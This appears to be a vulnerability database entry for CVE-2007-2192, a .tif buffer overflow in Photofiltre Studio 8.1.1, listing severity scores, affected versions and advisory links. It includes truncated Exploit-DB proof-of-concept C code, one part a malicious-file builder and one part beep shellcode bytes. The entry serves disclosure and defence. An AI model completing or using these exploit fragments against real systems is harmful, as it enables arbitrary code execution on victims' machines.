CVE-2007-2192
Published 2007-04-24
CVE-2007-2192: Buffer overflow in Photofiltre Studio 8.1.1 allows user-assisted remote attackers to execute arbitrary code via a crafted .tif file.
Priority P340, critical, 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 7.19% (93.5th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| antonio_da_cruz | photofiltre_studio | — | — |
No detection rules found.
Exploit-DB
PhotoFiltre Studio X - '.tif' Local Buffer Overflow
exploitdb·2010-05-04
---
#include
#define fisier FILE
#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)
#define VER "10.3.0"
#define POCNAME "[*]PhotoFiltre Studio X .tif file local buffer overflow poc(0day)"
#define AUTHOR "[*]fl0 fl0w"
typedef char i8;
typedef short i16;
typedef int i32;
void gen_random(i8*,const int);
void print(i8*);
i32 mcpy(void*,const void*,i32);
void fwi32(fisier*,i32);
i32 filerr(fisier*);
void error(void);
void filebuild();
unsigned int getFsize(fisier*,i8*);
i32 sizes[]={257,163,217,213,940,29};
typedef struct {
/*Retcodes from MS Windows xp pro sp3
*/
i32 popopret;
i32 jmpbyte;
i32 jmpEBP;
}instr;
i32 main()
{filebuild();
printf("%s\n%s\n",POCNAME,AUTHOR);
print("file done");
getchar();
}
void filebuild() {
/*The logic: overwrite
Exploit-DB
PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow
exploitdb·2007-04-21
---
/********************************************************************************
* *
* Photofiltre Studio v8.1.1 .TIF File Buffer Overflow *
* *
* *
* Photofiltre is vulnerable to an unspecified buffer overflow when processing a *
* crafted .TIF file. *
* This exploit just beeps (useless but incredibly noisy!!). *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
********************************************************************************/
#include "stdio.h"
#include "stdlib.h"
// Beep Shellcode, made by xnull
// Woaw this is very ... Hum try it!
unsigned char beepsp2[] =
"\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC"
"\x77\x7A\x83\x7C" //Address \x77\x7A\x83\x7C = SP2
"\xC7\x44\x24\x04"
"\
No writeups or analysis indexed.
http://osvdb.org/35265
http://secunia.com/advisories/24981
http://www.securityfocus.com/bid/23582
http://www.vupen.com/english/advisories/2007/1490
https://exchange.xforce.ibmcloud.com/vulnerabilities/33807
https://www.exploit-db.com/exploits/3772
Published: 2007-04-24